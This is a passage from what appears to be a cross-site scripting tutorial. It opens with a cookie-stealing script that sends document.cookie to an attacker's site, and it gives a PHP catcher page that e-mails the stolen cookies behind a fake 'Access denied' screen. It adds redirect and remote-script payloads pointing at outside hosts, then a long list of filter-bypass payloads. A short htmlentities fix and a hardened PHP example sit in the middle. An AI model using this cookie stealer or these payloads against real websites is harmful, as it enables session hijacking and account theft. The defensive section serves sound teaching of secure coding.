n/cookie.php?cookies="+document.cookie); </script>
(www.Hax0r.com = your website) Open Notepad, paste in the code below, and save it as cookie.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th { color: #FFFFFF; }
body { background-color: #000000; }
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>
For the attacker this alone is still not enough; rather than waiting around, he simply receives the e-mail.
Fixing the vulnerability: use htmlentities to fix the XSS vulnerability.
On line 16, replace:
<body>
<span class="alerte">Search result :</span>
<strong><?php echo $_POST['Vulnerability']; ?></strong>
</body>
with:
<body>
<span class="alerte">Search result :</span>
<strong><?php if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>
</body>
Or use the htmlspecialchars() function in PHP.
Other functions: htmlentities(), quotes, strip_tags() ...
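A hardened form of the search page above, as an added example that is not part of the original tutorial: it escapes with explicit flags so that single quotes are encoded too, and it validates a URL before it reaches a src attribute, where escaping alone does not help. The helper names e() and safe_url() and the avatar field are assumptions made for illustration.

```php
<?php
// Added example, not from the original tutorial.
// e(), safe_url() and the "avatar" field are hypothetical names.

// Escape for HTML element content and for quoted attribute values.
// ENT_QUOTES also encodes ' (before PHP 8.1 the default flags left it alone);
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning "".
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Escaping does not neutralise a dangerous URL scheme: a javascript: URL
// contains no HTML metacharacters. Allow only absolute http/https URLs
// and reject everything else (fail closed).
function safe_url(string $url): ?string
{
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

// Constructed sample inputs, using strings that appear on this page.
$search = $_POST['Vulnerability'] ?? "'\">><script>alert('XSS')</script>";
$avatar = $_POST['avatar'] ?? "javascript:alert('XSS')";

$link = safe_url($avatar);
?>
<body>
<span class="alerte">Search result :</span>
<strong><?php echo e($search); ?></strong>
<!-- attribute context: always quote the attribute and escape with ENT_QUOTES -->
<input type="text" name="Vulnerability" value='<?php echo e($search); ?>'>
<?php if ($link !== null): ?>
<img src="<?php echo e($link); ?>" alt="">
<?php else: ?>
<em>image URL rejected</em>
<?php endif; ?>
</body>
```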
Carrying out an XSS attack is fairly simple; here are some commonly used methods:
Using an image: <IMG SRC="/Article/UploadFiles/200805/20080501095810619.png">
Using Flash: <EMBED SRC="http://hax0r.com/Haxored.swf">
Redirection: <script>window.open( "http://lovelaozang.cn/xss.html" )</script>
Also: <meta http-equiv="refresh" content="0; url=http://lovelaozang.cn/xss.html" />
.:Chapter 6 - Filter bypass :.
In fact, htmlspecialchars() is not that easy to bypass.
Here are some examples of XSS filter bypasses:
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
window.alert("Xyli !";
"/></a></><img src=1.gif onerror=alert(1)>
[color=red' onmouseover="alert('xss')"]mouse over
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
click me
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<font style='color:expression(alert(document.cookie))'>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
"><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav
ascr